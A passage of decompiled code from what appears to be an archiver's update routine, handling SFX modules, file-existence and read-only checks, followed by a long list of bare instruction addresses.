																																 *(_t1900 - 0x124) = _t1886;
																																_push(_t1900 - 0x8c);
																																 *(_t1900 - 0x120) = _t1886;
																																_push(_t1900 - 0x44);
																																_push( *(_t1900 + 0x18));
																																 *(_t1900 - 0x11c) = _t1886;
																																_push(_t1900 - 0x24c);
																																_push( ~( *(_t1470 + 9)) &  *(_t1900 - 0x4c));
																																_push(_t1900 - 0xa8);
																																_t470 = _t1866 + 0xc; // 0xc
																																_push( *(_t1900 - 0xb8));
																																_push(_t1866 + 0x64);
																																_push( *((intOrPtr*)(_t1900 - 0x68)));
																																_t1849 = E00B40371(_t1470,  *(_t1900 + 8));
																																__eflags = _t1849 - _t1886;
																																if(_t1849 != _t1886) {
																																	E00B11E89(_t1305,  *(_t1900 - 0x1c));
																																	 *(_t1900 - 4) = 0x1f;
																																	E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																	 *(_t1900 - 4) = 0x15;
																																	L00B41A7C(_t1470, _t1900 - 0xa8);
																																	 *(_t1900 - 4) = 0x25;
																																	E00B3E068(_t1900 - 0x44);
																																	 *(_t1900 - 4) = 0x14;
																																	L00B41B84(_t1470, _t1900 - 0x44);
																																	 *(_t1900 - 4) = 0x26;
																																	goto L216;
																																}
																																_t1833 = _t1900 - 0x124;
																																_t1849 =  *((intOrPtr*)( *( *(_t1900 + 0x1c)) + 0x50))(_t1900 - 0x124);
																																__eflags = _t1849 - _t1886;
																																if(_t1849 != _t1886) {
																																	E00B11E89(_t1313,  *(_t1900 - 0x1c));
																																	 *(_t1900 - 4) = 0x1f;
																																	E00B11E89(L00B41B0E(_t1900 - 0x8c),  *(_t1900 - 0x4c));
																																	 *(_t1900 - 4) = 0x15;
																																	L00B41A7C(_t1470, _t1900 - 0xa8);
																																	 *(_t1900 - 4) = 0x27;
																																	E00B3E068(_t1900 - 0x44);
																																	 *(_t1900 - 4) = 0x14;
																																	L00B41B84(_t1470, _t1900 - 0x44);
																																	 *(_t1900 - 4) = 0x28;
																																	goto L216;
																																}
																															}
																															 *(_t1900 - 4) = 0x20;
																															E00B11E89(_t1313,  *(_t1900 - 0x1c));
																															 *(_t1900 + 0xc) =  *(_t1900 + 0xc) + 1;
																															__eflags =  *(_t1900 + 0xc) -  *(_t1470 + 0x5c);
																														} while ( *(_t1900 + 0xc) <  *(_t1470 + 0x5c));
																														goto L170;
																													}
																													_t1868 =  *(_t1900 - 0x224);
																													E00B14268(_t1900 - 0x4c, _t1868);
																													_t1327 = 0;
																													__eflags = _t1868 - _t1886;
																													if(_t1868 <= _t1886) {
																														goto L155;
																													} else {
																														goto L154;
																													}
																													do {
																														L154:
																														 *(_t1327 +  *(_t1900 - 0x4c)) =  *(_t1327 +  *(_t1900 - 0x4c)) & 0x00000000;
																														_t1327 = _t1327 + 1;
																														__eflags = _t1327 - _t1868;
																													} while (_t1327 < _t1868);
																													goto L155;
																												}
																												_t1833 =  *( *(_t1900 - 0x1ac) +  *(_t1900 - 0x1a8) * 4 - 4);
																												_push(_t1900 - 0xa8);
																												_t1849 = L00B41800(_t1470,  *(_t1900 + 0xc),  *( *(_t1900 - 0x1ac) +  *(_t1900 - 0x1a8) * 4 - 4), __eflags);
																												__eflags = _t1849 - _t1886;
																												if(_t1849 == _t1886) {
																													goto L152;
																												}
																												 *(_t1900 - 4) = 0x15;
																												L00B41A7C(_t1470, _t1900 - 0xa8);
																												 *(_t1900 - 4) = 0x1d;
																												E00B3E068(_t1900 - 0x44);
																												 *(_t1900 - 4) = 0x14;
																												L00B41B84(_t1470, _t1900 - 0x44);
																												 *(_t1900 - 4) = 0x1e;
																												goto L216;
																											} else {
																												goto L135;
																											}
																											do {
																												L135:
																												__eflags =  *(_t1900 + 0xb);
																												_t1894 =  *((intOrPtr*)( *((intOrPtr*)(_t1470 + 0x58)) + _t1851 * 4)) + 0xc;
																												if( *(_t1900 + 0xb) != 0) {
																													L00B12F78(_t1894 + 0xc, _t1900 - 0xb4);
																												}
																												__eflags =  *((char*)(_t1470 + 6));
																												if( *((char*)(_t1470 + 6)) == 0) {
																													__eflags = _t1851;
																													if(__eflags > 0) {
																														L140:
																														_push(_t1900 - 0x38);
																														E00B3E1FE(_t1894, _t1833, __eflags);
																														 *(_t1900 - 4) = 0x19;
																														_t1338 = L00B1707D( *(_t1900 - 0x38), __eflags);
																														__eflags = _t1338;
																														if(_t1338 != 0) {
																															_t1869 =  *(_t1900 + 0x14);
																															 *_t1869 = 0x50;
																															E00B1275A( &(_t1869[1]), "The file already exists");
																															_t1473 =  &(_t1869[4]);
																															E00B56B33( &(_t1869[4]));
																															_push(_t1900 - 0x38);
																															_t1342 = E00B11524( &(_t1869[4]));
																															_t1849 =  *_t1869;
																															__eflags = _t1849;
																															if(__eflags != 0) {
																																if(__eflags > 0) {
																																	_t1849 = _t1849 & 0x0000ffff | 0x80070000;
																																	__eflags = _t1849;
																																}
																															} else {
																																_t1849 = 0x80004005;
																															}
																															E00B11E89(_t1342,  *(_t1900 - 0x38));
																															 *(_t1900 - 4) = 0x1a;
																															E00B3E068(_t1900 - 0x44);
																															 *(_t1900 - 4) = 0x14;
																															L00B41B84(_t1473, _t1900 - 0x44);
																															 *(_t1900 - 4) = 0x1b;
																															goto L216;
																														}
																														 *(_t1900 - 4) = 0x15;
																														E00B11E89(_t1338,  *(_t1900 - 0x38));
																														goto L142;
																													}
																													__eflags =  *(_t1900 + 0x13);
																													if(__eflags != 0) {
																														goto L142;
																													}
																													goto L140;
																												}
																												L142:
																												_t1851 = _t1851 + 1;
																												__eflags = _t1851 -  *(_t1470 + 0x5c);
																											} while (_t1851 <  *(_t1470 + 0x5c));
																											_t1886 = 0;
																											__eflags = 0;
																											goto L144;
																										}
																										_t1871 = 0;
																										__eflags =  *(_t1470 + 0x5c);
																										if(__eflags <= 0) {
																											goto L134;
																										} else {
																											goto L127;
																										}
																										while(1) {
																											L127:
																											_push(_t1900 - 0x80);
																											_t1352 = E00B3E1FE( *((intOrPtr*)( *((intOrPtr*)(_t1470 + 0x58)) + _t1871 * 4)) + 0xc, _t1833, __eflags);
																											_t1895 = 0;
																											 *(_t1900 - 4) = 0x16;
																											__eflags =  *(_t1900 - 0x224);
																											if( *(_t1900 - 0x224) <= 0) {
																												goto L131;
																											} else {
																												goto L128;
																											}
																											do {
																												L128:
																												L00B2EF0D(_t1900 - 0x24c, _t1900 - 0x28, _t1895);
																												_t1356 =  *(_t1900 - 0x24);
																												 *(_t1900 - 4) = 0x17;
																												__eflags =  *(_t1900 - 0x24) -  *((intOrPtr*)(_t1900 - 0x7c));
																												if( *(_t1900 - 0x24) !=  *((intOrPtr*)(_t1900 - 0x7c))) {
																													goto L130;
																												}
																												_t1356 = wcscmp( *(_t1900 - 0x28),  *(_t1900 - 0x80));
																												__eflags = _t1356;
																												if(_t1356 == 0) {
																													E00B12D90(_t1900 - 0x38);
																													 *(_t1900 - 4) = 0x18;
																													L00B13076(_t1900 - 0x38, "It is not allowed to include archive to itself");
																													L00B130FE(_t1900 - 0x38);
																													L00B13171(_t1900 - 0x38, __eflags, _t1900 - 0x80);
																													E00B12EA8(_t1900 - 0x2a8, __eflags, _t1900 - 0x38);
																													_push(0xb949e0);
																													_push(_t1900 - 0x2a8);
																													L00B7F160();
																													goto L134;
																												}
																												L130:
																												 *(_t1900 - 4) = 0x16;
																												_t1352 = E00B11E89(_t1356,  *(_t1900 - 0x28));
																												_t1895 = _t1895 + 1;
																												__eflags = _t1895 -  *(_t1900 - 0x224);
																											} while (_t1895 <  *(_t1900 - 0x224));
																											L131:
																											 *(_t1900 - 4) = 0x15;
																											E00B11E89(_t1352,  *(_t1900 - 0x80));
																											_t1871 = _t1871 + 1;
																											__eflags = _t1871 -  *(_t1470 + 0x5c);
																											if(__eflags >= 0) {
																												goto L134;
																											}
																										}
																									} else {
																										__eflags =  *_t1470;
																										if( *_t1470 == 0) {
																											goto L125;
																										}
																										_t1872 =  *((intOrPtr*)( *((intOrPtr*)(_t1470 + 0x58)))) + 0xc;
																										L00B419C6(_t1872, _t1470 + 0x64);
																										__eflags =  *((char*)(_t1900 + 0x23));
																										if( *((char*)(_t1900 + 0x23)) != 0) {
																											L119:
																											__eflags =  *(_t1900 + 0xb);
																											if( *(_t1900 + 0xb) == 0) {
																												__eflags =  *(_t1470 + 0xfc);
																												if( *(_t1470 + 0xfc) == 0) {
																													 *((char*)(_t1872 + 0x3c)) = 1;
																													__eflags =  *(_t1470 + 0xe4);
																													 *(_t1900 + 0x13) = 1;
																													_t1896 = _t1872 + 0x40;
																													if( *(_t1470 + 0xe4) == 0) {
																														_t1873 = _t1872 + 0xc;
																														__eflags = _t1873;
																														_push(_t1873);
																													} else {
																														_push(_t1470 + 0xe0);
																													}
																													L00B12F78(_t1896);
																													E00B182BD(_t1896);
																												}
																											}
																											goto L125;
																										}
																										__eflags =  *(_t1470 + 0xe4);
																										if( *(_t1470 + 0xe4) == 0) {
																											goto L125;
																										}
																										goto L119;
																									}
																								}
																								 *(_t1900 + 0x10) =  *(_t1900 + 0x10) & 0x00000000;
																								__eflags =  *(_t1470 + 0x5c);
																								if( *(_t1470 + 0x5c) <= 0) {
																									goto L112;
																								}
																								_t1842 =  *((intOrPtr*)(_t1470 + 0x58));
																								do {
																									_t1377 =  *_t1842 + 0x64;
																									_t1874 = 0;
																									__eflags = 0;
																									_t1758 = _t1377;
																									while(1) {
																										__eflags =  *_t1758 - 2;
																										if( *_t1758 == 2) {
																											break;
																										}
																										_t1874 = _t1874 + 1;
																										_t1758 = _t1758 + 4;
																										__eflags = _t1874 - 7;
																										if(_t1874 < 7) {
																											continue;
																										}
																										_t1407 = _t1377 + 4;
																										__eflags = _t1407;
																										_t1777 = 1;
																										while(1) {
																											__eflags =  *_t1407;
																											if( *_t1407 != 0) {
																												goto L95;
																											}
																											_t1777 = _t1777 + 1;
																											_t1407 = _t1407 + 4;
																											__eflags = _t1777 - 7;
																											if(_t1777 < 7) {
																												continue;
																											}
																											goto L96;
																										}
																										break;
																									}
																									L95:
																									 *(_t1900 + 0xb) = 1;
																									L96:
																									 *(_t1900 + 0x10) =  *(_t1900 + 0x10) + 1;
																									_t1842 = _t1842 + 4;
																									__eflags =  *(_t1900 + 0x10) -  *(_t1470 + 0x5c);
																								} while ( *(_t1900 + 0x10) <  *(_t1470 + 0x5c));
																								__eflags =  *(_t1900 + 0xb);
																								if( *(_t1900 + 0xb) == 0) {
																									goto L112;
																								}
																								_t1380 =  *((intOrPtr*)( *_t1885 + 0x40))();
																								__eflags = _t1380;
																								if(_t1380 == 0) {
																									_t1875 =  *(_t1900 + 0xc);
																									 *((char*)(_t1900 - 0x21c)) =  *((intOrPtr*)(_t1470 + 0x11));
																									 *((char*)(_t1900 - 0x1b7)) =  *((intOrPtr*)(_t1470 + 0xb));
																									 *((char*)(_t1900 - 0x21b)) =  *((intOrPtr*)(_t1470 + 0xd));
																									 *((char*)(_t1900 - 0x21a)) =  *((intOrPtr*)(_t1875 + 0xc));
																									 *((char*)(_t1900 - 0x219)) =  *((intOrPtr*)(_t1875 + 0xd));
																									 *((char*)(_t1900 - 0x218)) =  *((intOrPtr*)(_t1470 + 3));
																									_t1387 = E00B12D90(_t1900 - 0x28);
																									_t1833 =  *(_t1470 + 0x1c);
																									_push(_t1900 - 0x24c);
																									_push(_t1387);
																									 *(_t1900 - 4) = 0x10;
																									_t1849 = E00B2F3F7(_t1875,  *(_t1470 + 0x1c));
																									 *(_t1900 - 4) = 0xe;
																									E00B11E89(_t1388,  *(_t1900 - 0x28));
																									__eflags = _t1849;
																									if(_t1849 == 0) {
																										_t1380 =  *((intOrPtr*)( *_t1885 + 0x44))(_t1900 - 0x214);
																										__eflags = _t1380;
																										if(_t1380 != 0) {
																											goto L99;
																										}
																										__eflags =  *(_t1470 + 0x1c) - 2;
																										if( *(_t1470 + 0x1c) != 2) {
																											_t1897 =  *(_t1900 + 0xc);
																											__eflags =  *((intOrPtr*)(_t1897 + 4)) - 1;
																											if( *((intOrPtr*)(_t1897 + 4)) == 1) {
																												E00B16529(_t1900 - 0xfc);
																												E00B12D90(_t1900 - 0xd4);
																												 *(_t1900 - 4) = 0x11;
																												E00B12EA8(_t1900 - 0x80, __eflags,  *((intOrPtr*)( *_t1897)));
																												 *(_t1900 - 4) = 0x12;
																												L00B130E2();
																												_push(0);
																												_push( *(_t1900 - 0x80));
																												_t1396 = E00B169AB(_t1900 - 0xfc);
																												__eflags = _t1396;
																												if(_t1396 != 0) {
																													_t1396 =  *(_t1900 - 0xdc) >> 4;
																													__eflags = _t1396 & 0x00000001;
																													if((_t1396 & 0x00000001) != 0) {
																														 *(_t1900 + 8) =  *(_t1900 + 8) | 0xffffffff;
																														__eflags =  *((char*)(_t1470 + 0xb));
																														_t1773 = 0xa;
																														_t1401 = memcpy(_t1900 - 0x29c, _t1900 - 0xfc, _t1773 << 2);
																														_t1903 = _t1903 + 0xc;
																														 *(_t1900 + 0x18) = _t1401;
																														if(__eflags != 0) {
																															L00B2F0CF(_t1900 - 0x24c, _t1900 - 0x80, _t1900 + 8);
																														}
																														_t1396 =  *(_t1900 + 8);
																														 *(_t1900 - 0x250) =  *(_t1900 + 8);
																													}
																												}
																												_t1397 = E00B11E89(_t1396,  *(_t1900 - 0x80));
																												 *(_t1900 - 4) = 0xe;
																												E00B11E89(_t1397,  *((intOrPtr*)(_t1900 - 0xd4)));
																											}
																										}
																										goto L112;
																									}
																									__eflags = _t1849 - 0x80004004;
																									if(_t1849 != 0x80004004) {
																										E00B1275A( &(( *(_t1900 + 0x14))[1]), "Scanning error");
																									}
																									goto L217;
																								}
																								L99:
																								_t1849 = _t1380;
																								goto L217;
																							}
																							L00B3312E(_t1900 - 0x114, __eflags);
																							 *(_t1900 - 4) = 0xf;
																							E00B16529(_t1900 - 0x114);
																							_t1411 = L00B12F78(_t1900 - 0xec, _t1470 + 0xc8);
																							 *(_t1900 - 0x114) =  *(_t1900 - 0x114) | 0xffffffff;
																							 *(_t1900 - 0x110) =  *(_t1900 - 0x110) | 0xffffffff;
																							 *(_t1900 - 0xf4) = 0;
																							E00B1A540(_t1411, _t1900 - 0xfc);
																							_t1782 =  *((intOrPtr*)(_t1900 - 0xf8));
																							_t1413 =  *(_t1900 - 0xfc);
																							 *((intOrPtr*)(_t1900 - 0x100)) = _t1782;
																							 *((intOrPtr*)(_t1900 - 0x108)) = _t1782;
																							 *(_t1900 - 0x104) = _t1413;
																							 *(_t1900 - 0x10c) = _t1413;
																							E00B56B33(_t1900 - 0x228);
																							_push(_t1900 - 0x114);
																							E00B36287(_t1900 - 0x228);
																							 *(_t1900 - 4) = 0xe;
																							E00B30DCE(_t1900 - 0x114);
																							goto L112;
																						}
																						__eflags =  *(_t1900 + 0x13) - _t1019;
																						if( *(_t1900 + 0x13) == _t1019) {
																							goto L83;
																						}
																						_t1849 = 0x80004005;
																						goto L218;
																					}
																					_t1418 = L00B12E16(_t1900 - 0x28,  *0xb8bc2c);
																					 *(_t1900 - 4) = 0xc;
																					 *(_t1470 + 0x28) = E00B36BA0( *((intOrPtr*)(_t1900 - 0x68)), _t1418);
																					 *(_t1900 - 4) = 6;
																					_t1019 = E00B11E89(_t1419,  *(_t1900 - 0x28));
																					__eflags =  *(_t1470 + 0x28);
																					if( *(_t1470 + 0x28) >= 0) {
																						goto L80;
																					}
																					_t1849 = 0x80004001;
																					goto L218;
																				}
																				_push( *(_t1900 + 8));
																				_push( *((intOrPtr*)(_t1900 - 0x68)));
																				 *(_t1470 + 0x28) =  *( *( *(_t1900 - 0x1ac) +  *(_t1900 - 0x1a8) * 4 - 4) + 0x3c);
																				_t1015 = E00B3E3D5(_t1470, _t1849, __eflags);
																				__eflags = _t1015;
																				if(_t1015 != 0) {
																					goto L73;
																				}
																				goto L70;
																			} else {
																				_t1015 = E00B1275A( &(( *(_t1900 + 0x14))[1]), "There is some data block after the end of the archive");
																				L70:
																				E00B11E89(E00B11E89(_t1015,  *((intOrPtr*)(_t1900 - 0x2b8))),  *(_t1900 - 0x1c));
																				 *(_t1900 - 4) = 8;
																				_t1425 = E00B32046(_t1900 - 0x74);
																				L71:
																				E00B11E89(E00B11E89(_t1425,  *((intOrPtr*)(_t1900 - 0xd4))),  *(_t1900 - 0x58));
																				_t183 = _t1900 - 4;
																				 *_t183 =  *(_t1900 - 4) | 0xffffffff;
																				__eflags =  *_t183;
																				L00B319B4(_t1900 - 0x1ac);
																				goto L72;
																			}
																		}
																		_t1005 = E00B1275A( &(( *(_t1900 + 0x14))[1]),  *0xb8bc24);
																		_t1849 = 0x80004001;
																		goto L62;
																	}
																	__eflags =  *((intOrPtr*)(_t1900 - 0x170)) - _t1007;
																	if( *((intOrPtr*)(_t1900 - 0x170)) < _t1007) {
																		goto L58;
																	}
																	_t1849 = 1;
																	goto L57;
																} else {
																	L53:
																	_t1849 = _t1005;
																	L62:
																	E00B11E89(E00B11E89(_t1005,  *((intOrPtr*)(_t1900 - 0x2b8))),  *(_t1900 - 0x1c));
																	 *(_t1900 - 4) = 8;
																	_t995 = E00B32046(_t1900 - 0x74);
																	L63:
																	E00B11E89(E00B11E89(_t995,  *((intOrPtr*)(_t1900 - 0xd4))),  *(_t1900 - 0x58));
																	L219:
																	L266:
																	 *(_t1900 - 4) =  *(_t1900 - 4) | 0xffffffff;
																	L00B319B4(_t1900 - 0x1ac);
																	_t984 = _t1849;
																	goto L271;
																}
															}
															E00B56B33( &(( *(_t1900 + 0x14))[4]));
															_push(_t1900 - 0x58);
															E00B11524( &(( *(_t1900 + 0x14))[4]));
															_t995 = E00B1275A( &(( *(_t1900 + 0x14))[1]),  *0xb8bc24);
															goto L43;
														}
														__eflags =  *_t1470;
														if( *_t1470 == 0) {
															goto L48;
														}
														__eflags =  *(_t1900 - 0xdc) & 0x00000001;
														if(__eflags == 0) {
															goto L48;
														}
														_push(_t1884);
														_push(_t1900 - 0x58);
														_push("The file is read-only");
														L41:
														_t1849 = E00B3E0E5( *(_t1900 + 0x14), _t1900, __eflags);
														goto L63;
													}
													L43:
													_t1849 = 0x80004001;
													goto L63;
												}
												_push(_t1884);
												_push(_t1900 - 0x58);
												_push("There is a folder with the name of archive");
												goto L41;
											}
											__eflags =  *(_t1900 + 0x13) - _t993;
											if( *(_t1900 + 0x13) != _t993) {
												_t993 = _t1900 - 0x148;
												_push(0xb902c0);
												_push(_t1900 - 0x148);
												 *((intOrPtr*)(_t1900 - 0x148)) = "can\'t find archive";
												L00B7F160();
											}
											__eflags =  *(_t1470 + 0x28);
											if(__eflags >= 0) {
												L74:
												_t1885 =  *(_t1900 + 0x1c);
												goto L75;
											} else {
												_push(_t1847);
												_push( *((intOrPtr*)(_t1900 - 0x68)));
												_t993 = E00B3E3D5(_t1470, _t1847, __eflags);
												__eflags = _t993;
												if(_t993 != 0) {
													goto L74;
												}
												goto L71;
											}
										}
										__eflags =  *(_t1470 + 0x28);
										if( *(_t1470 + 0x28) >= 0) {
											_t1885 =  *(_t1900 + 0x1c);
											goto L77;
										} else {
											_push(0xb902c0);
											_push(_t1900 - 0x14c);
											 *((intOrPtr*)(_t1900 - 0x14c)) = "type of archive is not specified";
											L00B7F160();
											goto L33;
										}
									}
									__eflags = E00B3E36A(_t1470,  *((intOrPtr*)(_t1900 - 0x68)),  *(_t1900 - 0xb8),  *(_t1900 + 8));
									if(__eflags == 0) {
										L27:
										_t1849 = 0x80004001;
										goto L266;
									}
									_push( *(_t1900 + 8));
									_push( *((intOrPtr*)(_t1900 - 0x68)));
									__eflags = E00B3E3D5(_t1470, _t1844, __eflags);
									if(__eflags != 0) {
										goto L28;
									}
									goto L27;
								}
								E00B12D90(_t1900 - 0x144);
								 *(_t1900 - 4) = 0;
								E00B12D90(_t1900 - 0x138);
								 *(_t1900 - 4) = _t1844;
								L00B13076(_t1900 - 0x144, "rsfx");
								E00B56B33(_t1470 + 0x48);
								_push(_t1900 - 0x144);
								E00B2286F(_t1470, _t1470 + 0x48);
								__eflags =  *(_t1470 + 0xc0);
								if( *(_t1470 + 0xc0) != 0) {
									 *(_t1900 - 0x29) =  *(_t1900 - 0x29) & 0x00000000;
									_t1844 = _t1470 + 0xbc;
									_t1833 = 0x5c;
									__eflags = E00B12296( *(_t1470 + 0xbc), 0x5c);
									if(__eflags >= 0) {
										L20:
										__eflags = L00B16FC5( *_t1844, __eflags);
										if(__eflags != 0) {
											goto L23;
										} else {
											_push(_t1844);
											_t1891 = E00B3E0A5( *(_t1900 + 0x14), _t1900, __eflags, "cannot find specified SFX module");
											goto L22;
										}
									} else {
										_t1833 = L00B15549(_t1900 - 0xc4, __eflags);
										 *(_t1900 - 4) = 2;
										_t1461 = E00B12D35(_t1900 - 0x28, _t1460, _t1844);
										 *(_t1900 - 4) = 4;
										E00B11E89(_t1461,  *((intOrPtr*)(_t1900 - 0xc4)));
										_t1463 = L00B16FC5( *(_t1900 - 0x28), __eflags);
										__eflags = _t1463;
										if(_t1463 != 0) {
											_t1463 = L00B12F78(_t1844, _t1900 - 0x28);
											 *(_t1900 - 0x29) = 1;
										}
										 *(_t1900 - 4) = 1;
										_t1454 = E00B11E89(_t1463,  *(_t1900 - 0x28));
										__eflags =  *(_t1900 - 0x29);
										if(__eflags != 0) {
											L23:
											_t51 = _t1900 - 4;
											 *_t51 =  *(_t1900 - 4) | 0xffffffff;
											__eflags =  *_t51;
											E00B11E89(E00B11E89(_t1454,  *(_t1900 - 0x138)),  *(_t1900 - 0x144));
											goto L24;
										}
										goto L20;
									}
								} else {
									_t1457 = E00B1275A( &(( *(_t1900 + 0x14))[1]), "SFX file is not specified");
									_t1891 = 0x80004005;
									L22:
									E00B11E89(E00B11E89(_t1457,  *(_t1900 - 0x138)),  *(_t1900 - 0x144));
									goto L228;
								}
							}
							__eflags =  *((char*)(_t1470 + 7));
							if( *((char*)(_t1470 + 7)) != 0) {
								goto L72;
							}
							goto L13;
						}
						__eflags =  *(_t1470 + 0x5c) - _t1844;
						if( *(_t1470 + 0x5c) == _t1844) {
							_t1832 = 2;
							_t1468 =  *((intOrPtr*)( *((intOrPtr*)(_t1470 + 0x58)))) + 0x6c;
							__eflags = _t1468;
							while(1) {
								__eflags =  *_t1468 - 2;
								if( *_t1468 != 2) {
									goto L72;
								}
								_t1832 = _t1832 + 1;
								_t1468 = _t1468 + 4;
								__eflags = _t1832 - 7;
								if(_t1832 < 7) {
									continue;
								}
								goto L11;
							}
						}
						goto L72;
					} else {
						goto L5;
					}
				} else {
					L5:
					_t984 = 0x80004005;
					L271:
					 *[fs:0x0] =  *((intOrPtr*)(_t1900 - 0xc));
					return _t984;
				}
			}
















































































































                                                                                                                    0x00b3e6a7
                                                                                                                    0x00b3e6ac
                                                                                                                    0x00b3e6b1
                                                                                                                    0x00b3e6b8
                                                                                                                    0x00b3e6c3
                                                                                                                    0x00b3e6c6
                                                                                                                    0x00b3e6cc
                                                                                                                    0x00b3e6cf
                                                                                                                    0x00b3e6dc
                                                                                                                    0x00b3e6df
                                                                                                                    0x00b3ec5a
                                                                                                                    0x00b3ec5a
                                                                                                                    0x00000000
                                                                                                                    0x00b3ec5a
                                                                                                                    0x00b3e6eb
                                                                                                                    0x00b3e6f3
                                                                                                                    0x00b3e704
                                                                                                                    0x00b3e708
                                                                                                                    0x00b3e730
                                                                                                                    0x00b3e736
                                                                                                                    0x00b3e73e
                                                                                                                    0x00b3e746
                                                                                                                    0x00b3e74b
                                                                                                                    0x00b3e751
                                                                                                                    0x00b3e75d
                                                                                                                    0x00b3e75d
                                                                                                                    0x00b3e761
                                                                                                                    0x00b3e896
                                                                                                                    0x00b3e89c
                                                                                                                    0x00b3e8a1
                                                                                                                    0x00b3e8a7
                                                                                                                    0x00b3e8a8
                                                                                                                    0x00b3e8ab
                                                                                                                    0x00b3e8df
                                                                                                                    0x00b3e8df
                                                                                                                    0x00b3e8e5
                                                                                                                    0x00b3e8e8
                                                                                                                    0x00b3e8ed
                                                                                                                    0x00b3e8f4
                                                                                                                    0x00b3e8f8
                                                                                                                    0x00b3e900
                                                                                                                    0x00b3e909
                                                                                                                    0x00b3e90d
                                                                                                                    0x00b3e912
                                                                                                                    0x00b3e919
                                                                                                                    0x00b3e921
                                                                                                                    0x00b3e928
                                                                                                                    0x00b3e928
                                                                                                                    0x00b3e92d
                                                                                                                    0x00b3e930
                                                                                                                    0x00b3e934
                                                                                                                    0x00b3e95b
                                                                                                                    0x00b3e961
                                                                                                                    0x00b3e96c
                                                                                                                    0x00b3e971
                                                                                                                    0x00b3e979
                                                                                                                    0x00b3e97c
                                                                                                                    0x00b3e980
                                                                                                                    0x00b3e985
                                                                                                                    0x00b3e987
                                                                                                                    0x00b3e9d1
                                                                                                                    0x00b3e9d4
                                                                                                                    0x00b3e9d6
                                                                                                                    0x00b3e9f1
                                                                                                                    0x00b3e9f8
                                                                                                                    0x00b3ea04
                                                                                                                    0x00b3ea08
                                                                                                                    0x00b3ea24
                                                                                                                    0x00b3ea24
                                                                                                                    0x00b3ea2b
                                                                                                                    0x00b3ea58
                                                                                                                    0x00b3ea5d
                                                                                                                    0x00b3ea61
                                                                                                                    0x00b3ea65
                                                                                                                    0x00b3ea6a
                                                                                                                    0x00b3ea76
                                                                                                                    0x00b3ea76
                                                                                                                    0x00b3ea7d
                                                                                                                    0x00b3ea80
                                                                                                                    0x00b3ea83
                                                                                                                    0x00b3ea8c
                                                                                                                    0x00b3ea90
                                                                                                                    0x00b3ea98
                                                                                                                    0x00b3ea9f
                                                                                                                    0x00b3eaa8
                                                                                                                    0x00b3eab1
                                                                                                                    0x00b3eaba
                                                                                                                    0x00b3eaca
                                                                                                                    0x00b3eace
                                                                                                                    0x00b3ead4
                                                                                                                    0x00b3ead9
                                                                                                                    0x00b3eae3
                                                                                                                    0x00b3eae6
                                                                                                                    0x00b3eae8
                                                                                                                    0x00b3eafe
                                                                                                                    0x00b3eb03
                                                                                                                    0x00b3eb05
                                                                                                                    0x00b3eb07
                                                                                                                    0x00b3eb14
                                                                                                                    0x00b3eb14
                                                                                                                    0x00b3eb19
                                                                                                                    0x00b3eb1b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3eb1d
                                                                                                                    0x00b3eb2f
                                                                                                                    0x00b3eb32
                                                                                                                    0x00b3eb34
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3eb36
                                                                                                                    0x00b3eb38
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3eb3a
                                                                                                                    0x00b3eb41
                                                                                                                    0x00b3eb99
                                                                                                                    0x00b3eb9f
                                                                                                                    0x00b3eba6
                                                                                                                    0x00b3ebaa
                                                                                                                    0x00b3ebad
                                                                                                                    0x00b3ebaf
                                                                                                                    0x00b3ebb2
                                                                                                                    0x00b3ebba
                                                                                                                    0x00b3ebc3
                                                                                                                    0x00b3ebc3
                                                                                                                    0x00b3ebc3
                                                                                                                    0x00b3ebc7
                                                                                                                    0x00b3ebca
                                                                                                                    0x00b3ebca
                                                                                                                    0x00b3ebd0
                                                                                                                    0x00b3ebd4
                                                                                                                    0x00b3ebe8
                                                                                                                    0x00b3ebec
                                                                                                                    0x00b3ec64
                                                                                                                    0x00b3ec72
                                                                                                                    0x00b3ec78
                                                                                                                    0x00b3ec80
                                                                                                                    0x00b3ec8a
                                                                                                                    0x00b3ec90
                                                                                                                    0x00b3ec94
                                                                                                                    0x00b3ec9f
                                                                                                                    0x00b3eca1
                                                                                                                    0x00b3eca4
                                                                                                                    0x00b3ece0
                                                                                                                    0x00b3ece0
                                                                                                                    0x00b3ece6
                                                                                                                    0x00b3ece8
                                                                                                                    0x00b3eceb
                                                                                                                    0x00b3ecfc
                                                                                                                    0x00b3ed02
                                                                                                                    0x00b3ed0e
                                                                                                                    0x00b3ed10
                                                                                                                    0x00b3ed1c
                                                                                                                    0x00b3ed22
                                                                                                                    0x00b3ed27
                                                                                                                    0x00b3ed2b
                                                                                                                    0x00b3ed2f
                                                                                                                    0x00b3ed32
                                                                                                                    0x00b3edd8
                                                                                                                    0x00b3eddc
                                                                                                                    0x00b3ede0
                                                                                                                    0x00b3efb6
                                                                                                                    0x00b3efbc
                                                                                                                    0x00b3efc1
                                                                                                                    0x00b3efc5
                                                                                                                    0x00b3efd2
                                                                                                                    0x00b3efd6
                                                                                                                    0x00b3efdb
                                                                                                                    0x00b3efdf
                                                                                                                    0x00b3efe3
                                                                                                                    0x00b3efe5
                                                                                                                    0x00b3efe9
                                                                                                                    0x00b3efeb
                                                                                                                    0x00b3eff7
                                                                                                                    0x00b3f009
                                                                                                                    0x00b3f014
                                                                                                                    0x00b3f019
                                                                                                                    0x00b3f019
                                                                                                                    0x00b3efe9
                                                                                                                    0x00b3f020
                                                                                                                    0x00b3f025
                                                                                                                    0x00b3f029
                                                                                                                    0x00b3f02d
                                                                                                                    0x00b3f031
                                                                                                                    0x00b3f098
                                                                                                                    0x00b3f098
                                                                                                                    0x00b3f09c
                                                                                                                    0x00b3f175
                                                                                                                    0x00b3f175
                                                                                                                    0x00b3f177
                                                                                                                    0x00b3f179
                                                                                                                    0x00b3f17c
                                                                                                                    0x00b3f1e0
                                                                                                                    0x00b3f1e6
                                                                                                                    0x00b3f1eb
                                                                                                                    0x00b3f1ef
                                                                                                                    0x00b3f1f3
                                                                                                                    0x00b3f2c2
                                                                                                                    0x00b3f2c2
                                                                                                                    0x00b3f2c5
                                                                                                                    0x00b3f2c8
                                                                                                                    0x00b3f2cc
                                                                                                                    0x00b3f2d0
                                                                                                                    0x00b3f2f3
                                                                                                                    0x00b3f2f9
                                                                                                                    0x00b3f2fe
                                                                                                                    0x00b3f301
                                                                                                                    0x00b3f305
                                                                                                                    0x00b3f308
